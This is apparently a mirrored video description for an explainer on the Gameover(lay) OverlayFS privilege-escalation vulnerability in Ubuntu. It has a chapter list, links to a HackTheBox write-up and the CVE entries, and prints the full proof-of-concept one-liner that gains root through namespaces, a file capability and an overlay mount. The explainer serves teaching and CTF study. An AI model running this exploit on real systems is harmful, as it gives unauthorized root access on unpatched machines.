Gameover(lay) Exploit Explained
The Gameover(lay) (CVE-2023-2640 / CVE-2023-32629) vulnerability was a big deal in late July 2023. The POC is super short, and yet complex. We'll walk through the lines one by one, and understand what it's doing and how it provides a low privilege user root access by abusing the OverlayFS and how it manages file attributes (like capabilities) when syncing between upper and lower.
Exploit: unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; id")'
HackTheBox Analytics Blog post: https://0xdf.gitlab.io/2024/03/23/htb...
HackTheBox Analytics: https://www.hackthebox.com/machines/a...
OverlayFS explained post from Julia Evans: https://jvns.ca/blog/2019/11/18/how-c...
Exploit Tweet from @liadeliyahu: / 1684841527959273472
CVE-2023-2640: https://www.cvedetails.com/cve/CVE-20...
CVE-2023-32629: https://www.cvedetails.com/cve/CVE-20...
☕ Buy Me A Coffee: https://www.buymeacoffee.com/0xdf
[00:00] Introduction
[00:47] Show exploit
[01:23] unshare / namespaces
[02:54] Setup files within namespace
[04:39] mount OverlayFS
[05:56] Using touch to get files into upper
[06:20] Exit namespace and escalate
[07:36] Revisiting exploit
[08:41] Conclusion
#pentest #ctf #bugbounty #gameoverlay #linux #privesc
Watch video Gameover(lay) Exploit Explained online without registration, duration hours minute second in high quality. This video was added by user 0xdf 14 March 2024, don't forget to share it with your friends and acquaintances, it has been viewed on our site 745 once and liked it 47 people.